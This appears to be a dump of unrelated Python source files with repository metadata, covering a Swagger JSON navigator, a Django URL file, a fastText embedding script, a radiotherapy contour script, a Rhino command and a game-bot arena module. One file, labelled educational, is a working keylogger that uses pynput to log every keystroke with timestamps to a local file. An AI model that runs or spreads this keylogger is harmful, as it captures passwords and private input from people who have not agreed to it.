return SwaggerNavigator(found_value, parent=self, selector = selector)
raise ValueError('{} is not an object or array. Cannot select {}.'.format(self, selector))
def remove(self, selector, required=False):
if self.is_object:
if selector in self.value:
del self.value[selector]
elif required:
raise ValueError('{} does not contain {} so it cannot be removed.'.format(self, selector))
elif self.is_array:
if selector >= 0 and selector < len(self.value):
del self.value[selector]
elif required:
raise ValueError('{} does not contain {} so it cannot be removed.'.format(self, selector))
else:
raise ValueError('{} is not an object or array. Cannot remove {}.'.format(self, selector))
def values(self):
if self.is_object:
return [self.get(key) for key in self.value.keys()]
elif self.is_array:
return [self.get(i) for i in range(len(self.value))]
return None
def items(self):
if self.is_object:
return [(key, self.get(key)) for key in self.value.keys()]
elif self.is_array:
return [(i, self.get(i)) for i in range(len(self.value))]
return None
@property
def is_none(self):
return self.value == None
@property
def is_empty(self):
if self.is_none:
return True
elif self.is_object or self.is_array:
return len(self.value) == 0
else:
return False
@property
def is_object(self):
return isinstance(self.value, dict)
def get_object(self, selector, default=REQUIRED):
navigator = self.get(selector, default=default)
if not (navigator.is_object or navigator.is_none):
raise ValueError('{} value {} is not an object.'.format(navigator, navigator.value))
return navigator
def get_or_add_object(self, selector, default=None):
if not self.contains(selector):
if self.is_object:
self.value[selector] = default if default else {}
elif self.is_array:
self.value.insert(selector, default if default else {})
else:
raise ValueError('{} is not an object or array. Cannot add {} at {}.'.format(self, default, selector))
return self.get_object(selector)
def add_object(self, selector, initial_value):
if self.contains(selector):
raise ValueError('{} already contains an {} value.'.format(self, selector))
if self.is_object:
self.value[selector] = initial_value
elif self.is_array:
self.value.insert(selector, initial_value)
else:
raise ValueError('{} is not an object or array. Cannot add {} at {}.'.format(self, initial_value, selector))
return self.get_object(selector)
def remove_object(self, selector, default=REQUIRED):
navigator = self.get_object(selector, default)
self.remove(selector, default is REQUIRED)
return navigator
@property
def is_array(self):
return isinstance(self.value, list)
def get_array(self, selector, default=REQUIRED):
navigator = self.get(selector, default=default)
if not (navigator.is_array or navigator.is_none):
raise ValueError('{} value {} is not an array.'.format(navigator, navigator.value))
return navigator
def remove_array(self, selector, default=REQUIRED):
navigator = self.get_array(selector, default)
self.remove(selector, default is REQUIRED)
return navigator
@property
def is_string(self):
return isinstance(self.value, str) or isinstance(self.value, unicode)
def get_string(self, selector, default=REQUIRED):
navigator = self.get(selector, default=default)
if not (navigator.is_string or navigator.is_none):
raise ValueError('{} value {} is not a string.'.format(navigator, navigator.value))
return navigator
def remove_string(self, selector, default=REQUIRED):
navigator = self.get_string(selector, default)
self.remove(selector, default is REQUIRED)
return navigator
@property
def is_boolean(self):
return isinstance(self.value, bool)
def get_boolean(self, selector, default=REQUIRED):
navigator = self.get(selector, default=default)
if not (navigator.is_boolean or navigator.is_none):
raise ValueError('{} value {} is not a boolean.'.format(navigator, navigator.value))
return navigator
def remove_boolean(self, selector, default=REQUIRED):
navigator = self.get_boolean(selector, default)
self.remove(selector, default is REQUIRED)
return navigator
@property
def is_int(self):
return isinstance(self.value, int)
def get_int(self, selector, default=REQUIRED):
navigator = self.get(selector, default=default)
if not (navigator.is_int or navigator.is_none):
raise ValueError('{} value {} is not a string.'.format(navigator, navigator.value))
return navigator
def remove_int(self, selector, default=REQUIRED):
navigator = self.get_int(selector, default)
self.remove(selector, default is REQUIRED)
return navigator
def get_root(self):
if self.parent == None:
return self
return self.parent.get_root()
@property
def is_ref(self):
return self.is_object and self.contains('$ref')
# Returns a SwaggerNavigator object at the position of the ref this navigator has found
def resolve_ref(self, ref = None):
if not ref: ref = self.get_string('$ref').value
ref_path = ref.split("/")
if ref_path[0] == "#":
nav = self.get_root()
ref_path.pop(0)
else:
nav = self.parent
while ref_path:
try:
nav = nav.get(ref_path.pop(0))
except ValueError as e:
raise ValueError("Error {} while resolving reference {} at {}".format(e, ref, self))
return nav
| 34.927711
| 128
| 0.61366
|
82c2a1c2c6d7ae30428299a80bdc638401533916
| 498
|
py
|
Python
|
KeyLogger.py
|
Kyogin/PythonGERAL
|
1e1be167c698050230fc07a3ddd2a2879fd26208
|
[
"MIT"
] | null | null | null |
KeyLogger.py
|
Kyogin/PythonGERAL
|
1e1be167c698050230fc07a3ddd2a2879fd26208
|
[
"MIT"
] | null | null | null |
KeyLogger.py
|
Kyogin/PythonGERAL
|
1e1be167c698050230fc07a3ddd2a2879fd26208
|
[
"MIT"
] | null | null | null |
#Code by: Matheus Franco // Kyogin
#Educational Content ONLY
#Feel free to change this code
from pynput.keyboard import Key, Listener
import logging
log_dir = "hook.txt" #.txt será criado no diretório no seu .py, caso queira alterar, colocar o caminho aí
logging.basicConfig(filename=(log_dir + "key_log.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
| 31.125
| 112
| 0.7249
|
4add4764e6f89b7b8ec08aa8ce427f8af47af362
| 134
|
py
|
Python
|
Proyecto/DacodesJobs/Modulos/Candidatos/urls.py
|
angel318/DacodesJobs
|
3a8bb0248ab8addf462b175e039ae935a5e34197
|
[
"bzip2-1.0.6"
] | null | null | null |
Proyecto/DacodesJobs/Modulos/Candidatos/urls.py
|
angel318/DacodesJobs
|
3a8bb0248ab8addf462b175e039ae935a5e34197
|
[
"bzip2-1.0.6"
] | null | null | null |
Proyecto/DacodesJobs/Modulos/Candidatos/urls.py
|
angel318/DacodesJobs
|
3a8bb0248ab8addf462b175e039ae935a5e34197
|
[
"bzip2-1.0.6"
] | null | null | null |
from django.urls import path
from .views import *
urlpatterns = [
path('<int:pk>', Candidatos.as_view(), name = 'Candidatos'),
]
| 19.142857
| 64
| 0.671642
|
f30780e17957580236e6460b273c028bb42b93c2
| 2,642
|
py
|
Python
|
aidistillery/fasttext_embeddings.py
|
TheMTank/arxiv-summariser
|
db4f1e42bcc9185e197a00a18e280a4a3011453c
|
[
"MIT"
] | 17
|
2018-11-26T23:06:20.000Z
|
2022-01-18T21:43:17.000Z
|
aidistillery/fasttext_embeddings.py
|
TheMTank/arxiv-summariser
|
db4f1e42bcc9185e197a00a18e280a4a3011453c
|
[
"MIT"
] | 3
|
2018-11-27T12:17:20.000Z
|
2019-02-05T11:40:44.000Z
|
aidistillery/fasttext_embeddings.py
|
TheMTank/arxiv-summariser
|
db4f1e42bcc9185e197a00a18e280a4a3011453c
|
[
"MIT"
] | 3
|
2019-03-06T10:14:08.000Z
|
2020-01-21T17:26:20.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Generate embeddings using word2vec from a text collection
Example: `distill fasttext -f data/text -o data/saved_embedding -d 100`
"""
import argparse
from .data_cleaning import list_of_strings_to_list_of_lists, clean_raw_text_from_file, phrasing_sentences
from .models import fasttext_wrapper
def load_and_process(file_name, min_length):
"""
Arguments
---------
file_name: file that contains text from which we want to generate embeddings
min_length: required min length of sentences to be considered
Returns
-------
List of list of tokens for gensim.word2vec input
"""
cleaned_text = clean_raw_text_from_file(file_name, min_length=min_length)
phrased_lists = list_of_strings_to_list_of_lists(cleaned_text)
return phrased_lists
def fasttext_add_args(parser):
parser.add_argument('-f', '--file_name', default="text_to_embed.txt",
help="Text file")
parser.add_argument('-d', '--dimension', default="100",
help="Dimension of the desired embeddings", type=int)
parser.add_argument('-w', '--window', default="5",
help="Size of the window", type=int)
parser.add_argument('-mc', '--min_count', default="5",
help="Min number of occurrence of words", type=int)
parser.add_argument('-ml', '--min_length', default="200",
help="Min number of chars for a sentence", type=int)
parser.add_argument('-it', '--iterations', default="5",
help="Number of iteration for learning the embeddings", type=int)
parser.add_argument('-ws', '--workers', default="2",
help="Number of workers for this task", type=int)
parser.add_argument('-data', '--data', default="no_name_data",
help="Dataset name")
parser.add_argument('-o', '--output_file', default="output_embedding",
help="Output embedding file")
def fasttext_main(args):
print("Creating Embeddings with:", args.dimension, "dimensions", args.window, "window", args.min_count, "min_count")
print("Sentences with less than", args.min_length, "chars will be removed")
sentences = load_and_process(args.file_name, args.min_length)
ft = fasttext_wrapper.FastTextWrapper(sentences,
dimension=args.dimension,
window=args.window,
min_count=args.min_count,
workers=args.workers,
sg=0,
iterations=args.iterations)
model = ft.fit()
model.save(args.output_file)
| 37.211268
| 120
| 0.645344
|
b9ccf8c7b76cc287cd9ed06dbcfb491455f4cf1f
| 755
|
py
|
Python
|
ROIAlgebraOperation/ContourDelTest.py
|
az7jh2/My-Raystation-Scripts
|
3454378239320c2944fd96de8cb86be8824b5210
|
[
"MIT"
] | 1
|
2021-05-29T22:48:49.000Z
|
2021-05-29T22:48:49.000Z
|
ROIAlgebraOperation/ContourDelTest.py
|
az7jh2/My-Raystation-Scripts
|
3454378239320c2944fd96de8cb86be8824b5210
|
[
"MIT"
] | null | null | null |
ROIAlgebraOperation/ContourDelTest.py
|
az7jh2/My-Raystation-Scripts
|
3454378239320c2944fd96de8cb86be8824b5210
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from connect import *
patient=get_current('Patient')
examination=get_current('Examination')
structure_set=patient.PatientModel.StructureSets[examination.Name]
roi_geometries=structure_set.RoiGeometries['Bodys']
if hasattr(roi_geometries.PrimaryShape,'Contours'):
#ROI的类型为Contours
contour=roi_geometries.PrimaryShape.Contours
index=range(len(contour))
index.reverse()
for i in index:
if contour[i][0].z>-80.56 or contour[i][0]<-89.56:
contour.RemoveAt(i)
#测试结果表明contour和contour[i]的type为List[object],contour[i][j]的type为ExpandoObject
#对list使用remove方法,删除的元素位置会被后面的元素填补上
#若要同时遍历和删除,推荐用倒序
#raystation中提供了3种删除元素方法:contour.RemoveAll(),RemoveAt(),RemoveRange(),
#该方法中下标从0开始,不支持负数
| 31.458333
| 76
| 0.745695
|
ec939033c7afc401ed251ca6deed6ca722fa0638
| 761
|
py
|
Python
|
src/compas_rv2/ui/Rhino/RV2/dev/RV2form_attributes_cmd.py
|
selinabitting/compas-RV2
|
0884cc00d09c8f4a75eb2b97614105e4c8bfd818
|
[
"MIT"
] | 34
|
2020-04-27T13:54:38.000Z
|
2022-01-17T19:16:27.000Z
|
src/compas_rv2/ui/Rhino/RV2/dev/RV2form_attributes_cmd.py
|
selinabitting/compas-RV2
|
0884cc00d09c8f4a75eb2b97614105e4c8bfd818
|
[
"MIT"
] | 306
|
2020-04-27T12:00:54.000Z
|
2022-03-23T22:28:54.000Z
|
src/compas_rv2/ui/Rhino/RV2/dev/RV2form_attributes_cmd.py
|
selinabitting/compas-RV2
|
0884cc00d09c8f4a75eb2b97614105e4c8bfd818
|
[
"MIT"
] | 11
|
2020-06-30T08:23:40.000Z
|
2022-02-01T20:47:39.000Z
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from compas_rv2.rhino import get_scene
from compas_rv2.rhino import AttributesForm
from compas_rv2.rhino import rv2_error
__commandname__ = "RV2form_attributes"
@rv2_error()
def RunCommand(is_interactive):
scene = get_scene()
if not scene:
return
form = scene.get("form")[0]
if not form:
print("There is no FormDiagram in the scene.")
return
AttributesForm.from_sceneNode(form)
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
RunCommand(True)
| 21.138889
| 80
| 0.575558
|
d8cb0a8763608964a48dff37d11fcda4d170f96d
| 5,957
|
py
|
Python
|
bestmobabot/arena.py
|
moonzlo/bestmobabot
|
8229de71a9d288daf6a7e513907821570e2eb111
|
[
"MIT"
] | 2
|
2020-04-29T03:59:49.000Z
|
2021-11-25T17:07:44.000Z
|
bestmobabot/arena.py
|
moonzlo/bestmobabot
|
8229de71a9d288daf6a7e513907821570e2eb111
|
[
"MIT"
] | null | null | null |
bestmobabot/arena.py
|
moonzlo/bestmobabot
|
8229de71a9d288daf6a7e513907821570e2eb111
|
[
"MIT"
] | 1
|
2022-03-13T12:32:21.000Z
|
2022-03-13T12:32:21.000Z
|
"""
Arena hero selection logic.
"""
import math
from functools import reduce
from itertools import combinations, permutations
from operator import attrgetter, itemgetter
from typing import Callable, Iterable, List, Tuple, Optional, TypeVar
import numpy
from bestmobabot import types
from bestmobabot.logger import logger
from bestmobabot.model import model
from bestmobabot.responses import ArenaEnemy, GrandArenaEnemy, Hero
TEAM_SIZE = 5 # heroes
GRAND_TEAMS = 3
GRAND_SIZE = GRAND_TEAMS * TEAM_SIZE # heroes
TArenaEnemy = TypeVar('TArenaEnemy', ArenaEnemy, GrandArenaEnemy)
T = TypeVar('T')
T1 = TypeVar('T1')
T2 = TypeVar('T2')
# Shared for both arenas.
# ----------------------------------------------------------------------------------------------------------------------
def filter_enemies(enemies: Iterable[TArenaEnemy], clan_id: Optional[types.ClanID]) -> List[TArenaEnemy]:
return [enemy for enemy in enemies if enemy.user is not None and not enemy.user.is_from_clan(clan_id)]
def naive_select_attackers(heroes: Iterable[Hero]) -> List[Hero]:
"""
Selects the most powerful heroes.
"""
return sorted(heroes, key=attrgetter('power'), reverse=True)[:TEAM_SIZE]
# Enemy selection.
# ----------------------------------------------------------------------------------------------------------------------
def select_enemy(enemies: Iterable[ArenaEnemy], heroes: Iterable[Hero]) -> Tuple[TArenaEnemy, List[Hero], float]:
"""
Select enemy and attackers to maximise win probability.
"""
# noinspection PyTypeChecker
return max([(enemy, *model_select_attackers(heroes, enemy.heroes)) for enemy in enemies], key=itemgetter(2))
def select_grand_enemy(enemies: Iterable[GrandArenaEnemy], heroes: Iterable[Hero]) -> Tuple[GrandArenaEnemy, List[List[Hero]], float]:
"""
Select enemy and attackers to maximise win probability.
"""
# noinspection PyTypeChecker
return max([(enemy, *model_select_grand_attackers(heroes, enemy.heroes)) for enemy in enemies], key=itemgetter(2))
# Attackers selection.
# ----------------------------------------------------------------------------------------------------------------------
def model_select_attackers(heroes: Iterable[Hero], defenders: Iterable[Hero], verbose: bool = True) -> Tuple[List[Hero], float]:
"""
Select attackers for the given enemy to maximise win probability.
"""
attackers_list = [list(attackers) for attackers in combinations(heroes, TEAM_SIZE)]
x = numpy.array([get_model_features(attackers) for attackers in attackers_list]) - get_model_features(defenders)
y: numpy.ndarray = model.predict_proba(x)[:, 1]
index: int = y.argmax()
if verbose:
logger.debug(f'👊 Win probability: {100.0 * y[index]:.1f}%.')
return attackers_list[index], y[index]
def model_select_grand_attackers(heroes: Iterable[Hero], defenders_teams: Iterable[Iterable[Hero]]) -> Tuple[List[List[Hero]], float]:
"""
Select 3 teams of attackers for the given enemy to maximise win probability.
It's not giving the best solution but it's fast enough.
"""
defenders_teams = list(defenders_teams)
selections: List[Tuple[List[List[Hero]], float]] = []
# Try to form attackers teams in different order and maximise the final probability.
for order in permutations(range(3)):
used_heroes = set()
attackers_teams: List[List[Hero]] = [[], [], []]
probabilities: List[float] = [0.0, 0.0, 0.0]
for i in order:
heroes_left = [hero for hero in heroes if hero.id not in used_heroes]
attackers, probabilities[i] = model_select_attackers(heroes_left, defenders_teams[i], verbose=False)
attackers_teams[i] = attackers
used_heroes.update(attacker.id for attacker in attackers)
p1, p2, p3 = probabilities
p = p1 * p2 * p3 + p1 * p2 * (1.0 - p3) + p2 * p3 * (1.0 - p1) + p1 * p3 * (1.0 - p2)
selections.append((attackers_teams, p))
# Choose best selection.
attackers_teams, probability = max(selections, key=itemgetter(1))
logger.debug(f'👊 Win probability: {100.0 * probability:.1f}%.')
return attackers_teams, probability
# Features construction.
# ----------------------------------------------------------------------------------------------------------------------
def get_model_features(heroes: Iterable[Hero]) -> numpy.ndarray:
"""
Build model features for the specified heroes.
"""
return reduce(numpy.add, (hero.features for hero in heroes))
# Utilities.
# ----------------------------------------------------------------------------------------------------------------------
def secretary_max(items: Iterable[T1], n: int, key: Optional[Callable[[T1], T2]] = None) -> Tuple[T1, T2]:
"""
Select best item while lazily iterating over the items.
https://en.wikipedia.org/wiki/Secretary_problem#Deriving_the_optimal_policy
"""
key = key or (lambda item: item)
# We want to look at each item only once.
iterator = iter((item, key(item)) for item in items)
r = int(n / math.e) + 1
# Skip first (r - 1) items and remember the maximum.
_, max_key = max((next(iterator) for _ in range(r - 1)), key=itemgetter(1), default=(None, None))
# Find the first one that is better or the last one.
for item, item_key in iterator: # type: T1, T2
if max_key is None or item_key > max_key:
break
# noinspection PyUnboundLocalVariable
return item, item_key
def choose_multiple(items: Iterable[T], n: int, k: int) -> Iterable[Tuple[List[T], ...]]:
"""
Choose n groups of size k.
"""
if n == 0:
yield ()
return
for head in choose_multiple(items, n - 1, k):
used_keys = {item.id for sub_items in head for item in sub_items}
for tail in combinations((item for item in items if item.id not in used_keys), k):
yield (*head, [*tail])
| 39.713333
| 134
| 0.616082
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.